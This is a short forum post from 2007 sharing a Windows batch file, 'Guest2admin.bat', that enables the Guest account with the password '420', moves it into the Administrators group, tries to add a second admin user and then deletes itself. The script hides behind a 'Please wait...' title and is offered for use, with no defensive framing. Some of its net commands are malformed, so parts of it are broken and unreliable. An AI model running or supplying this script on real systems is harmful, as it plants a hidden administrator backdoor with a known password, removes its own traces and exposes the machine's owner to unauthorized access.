Turn Guest Account To Admin Account ;)

fviran

Active member
  • Oct 9, 2007
    4,054
    18
    38
    39
    public static void main(String[] args){}
    Turn "GUEST" with Admin privileges
    Copy this to notepad


    echo off
    title Please wait...
    cls
    net user add Username Password /add
    net user localgroup Administrators Username /add
    net user Guest 420 /active:yes
    net localgroup Guests Guest /DELETE
    net localgroup Administrators Guest /add
    del %0

    Save the file as "Guest2admin.bat"
    then u can double click the file to execute or run in the cmd.

    This turns your guest account into admin account.....